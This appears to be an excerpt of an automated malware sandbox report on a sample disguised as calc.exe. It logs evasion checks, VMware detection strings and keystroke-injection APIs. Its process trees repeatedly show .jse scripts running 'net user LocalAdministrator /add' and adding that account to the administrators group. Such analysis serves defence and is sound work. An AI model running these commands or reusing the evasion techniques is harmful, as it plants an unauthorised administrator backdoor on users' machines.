Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\Desktop\calc.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-51044

Source: C:\Users\user\Desktop\calc.exe

API coverage: 4.6 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00425639 FindFirstFileW,FindFirstFileW,SetCurrentDirectoryW,FindClose,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	0_2_00425639
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_004230D5 FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	0_2_004230D5
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0041510D FindFirstFileW,DeleteFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,FindNextFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,	0_2_0041510D
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0042320D FindFirstFileW,FindClose,	0_2_0042320D
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00426292 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00426292
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00425838 FindFirstFileW,FindNextFileW,FindClose,	0_2_00425838
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00422C4D FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	0_2_00422C4D
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00414E16 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00414E16
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00414FFA FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,	0_2_00414FFA

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_0040EA76 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,FreeLibrary,

0_2_0040EA76

Source: wscript.exe, 00000053.00000003.1336298343.0000000002B48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: calc.exe, 000000B0.00000002.1508910853.0000000000618000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: KcWar&Prod_VMware_SATA_CD00#

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_00439814 CharLowerBuffW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,_strcat,GetCurrentProcess,TerminateProcess,VariantClear,FreeLibrary,

0_2_00439814

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_0040109D GetCurrentDirectoryW,GetFullPathNameW,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,SetCurrentDirectoryW,

0_2_0040109D

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_00412196 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00412196

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_00415D53 mouse_event,

0_2_00415D53

Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" mumMT6WOaG.jse	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fhZL0KwyiV.jse	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" IDsLsRQlEe.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" cNs6XgJUw5.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" rbLiDVEIXX.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" UqWLwYRtxi.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iy4J2BVXGi.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" G0MZ6GMwly.jse
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nPYwCIjDlS.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fevGSHOMU4.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" jkdKCpQjxW.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iTc0FWDklf.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Ssbk19MNG3.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" R7pPYI1mUq.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xJLmgXOpyA.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nmkcc07AEX.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
